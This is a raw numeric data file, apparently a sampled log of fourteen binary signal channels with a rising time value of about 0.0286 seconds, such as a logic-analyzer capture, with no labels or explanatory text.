1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8628820e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8628844e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8628852e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8628868e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8628896e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8628920e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8628948e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8628996e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8629020e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8629068e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8629096e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8629100e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8629148e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8629172e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8629180e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8629220e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8629244e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8629296e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8629320e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8629348e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8629372e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8629396e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8629420e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8629468e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8629496e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8629548e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8629572e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8629576e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8629620e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8629644e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8629652e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8629696e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8629720e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8629772e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8629796e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8629820e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8629844e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8629852e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8629896e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8629920e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8629928e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8629948e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8629972e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8629996e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8630020e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8630044e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8630068e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8630096e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8630120e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8630124e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8630172e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8630196e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8630204e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8630220e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8630244e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8630252e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8630296e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8630320e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8630328e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8630348e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8630372e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8630396e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8630420e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8630444e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8630468e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8630476e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8630496e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8630520e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,2.8630524e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8630528e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8630572e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8630596e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8630620e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8630644e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8630652e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8630668e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8630696e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8630700e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8630748e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8630772e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8630820e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8630844e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8630896e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8630920e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8630972e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8630996e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8631000e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8631020e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8631044e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8631052e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8631068e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8631096e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8631100e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8631148e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8631172e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8631180e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8631196e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8631220e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8631244e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8631268e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8631296e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8631320e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8631348e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8631368e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,2.8631372e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8631376e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8631420e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8631444e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8631452e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8631468e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8631492e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8631516e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8631540e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8631568e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8631592e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8631620e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8631644e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8631668e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8631692e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8631716e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8631740e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8631768e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8631792e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8631820e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8631844e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8631868e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8631892e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8631916e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8631940e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8631968e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8631992e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8632020e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8632044e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8632068e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8632092e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8632116e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8632140e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8632172e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8632196e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8632220e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8632244e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8632268e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8632292e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,2.8756028e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.8756244e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,2.8756264e-02 0,1,0,1,0,0,0,0,0,0,0,1,0,1,2.8756292e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,2.8756320e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,1,2.8756600e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,2.8756628e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,2.8756652e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,2.8756676e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,2.8756700e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,2.8756724e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,2.8756748e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,2.8756776e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,2.8756800e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,2.8756828e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,2.8756832e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,1,2.8756852e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8756864e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8756876e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8756900e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8756924e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8756948e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8756976e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8756980e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8757000e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8757028e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8757052e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8757076e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8757100e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8757124e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8757148e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8757176e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8757180e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8757200e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8757228e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8757252e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8757276e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8757300e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8757324e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8757332e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8757348e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8757376e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8757400e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8757428e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8757452e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8757476e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8757500e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8757524e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8757532e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8757548e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8757576e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8757600e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8757628e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8757652e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8757676e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8757680e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8757700e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8757724e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8757748e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8757776e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8757800e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8757828e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8757852e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8757876e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8757884e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8757900e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8757924e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8757948e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8757976e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8758028e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8758052e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8758100e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8758124e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8758176e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8758200e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8758252e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8758276e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8758324e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8758348e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8758404e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8758428e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8758452e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8758476e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8758480e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8758500e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8758524e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8758548e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8758576e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8758600e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8758628e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8758652e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8758676e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8758700e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8758724e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8758732e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8758748e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8758776e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8758800e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8758828e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8758852e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8758876e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8758900e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8758924e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8758948e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8758976e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8759000e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8759028e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8759052e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8759076e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8759084e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8759100e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8759124e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8759148e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8759176e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8759200e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8759228e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8759252e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8759276e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8759300e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8759324e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8759348e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8759376e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8759400e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8759428e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8759432e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8759452e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8759476e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8759500e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8759524e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8759576e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8759600e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8759652e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8759676e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8759724e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8759748e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8759804e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8759828e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8759876e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8759900e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8759952e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8759976e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8760000e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8760028e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8760052e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8760076e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8760084e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8760100e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8760124e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8760132e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8760148e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8760176e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8760200e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8760228e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8760252e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8760276e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8760284e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8760300e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8760324e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8760348e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8760376e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8760400e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8760428e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8760452e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8760476e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8760500e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8760524e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8760548e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8760576e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8760600e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8760628e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8760652e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8760676e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8760684e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8760700e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8760724e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8760748e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8760776e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8760780e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8760800e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8760828e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8760852e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8760876e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8760900e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8760924e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8760948e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8760976e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8761000e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8761028e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8761032e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8761052e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8761076e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8761080e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8761100e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8761124e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8761132e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8761148e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8761176e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8761200e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8761228e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8761252e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8761276e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8761300e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8761324e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8761332e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8761348e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8761376e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8761380e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8761400e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8761428e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8761452e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8761476e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8761484e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8761500e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8761524e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8761548e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8761576e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8761600e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8761628e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8761652e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8761676e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8761680e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8761700e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8761724e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8761732e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8761748e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8761776e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8761800e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8761828e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8761852e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8761876e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8761900e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8761924e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8761948e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8761976e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8762000e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8762028e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8762032e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8762052e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8762076e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8762100e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8762124e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8762132e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8762148e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8762176e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8762180e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8762200e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8762228e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8762252e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8762276e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8762300e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8762324e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8762348e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8762376e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8762380e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.8762400e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.8762428e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8762432e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8762452e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8762476e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8762500e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.8762524e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.8762548e-02 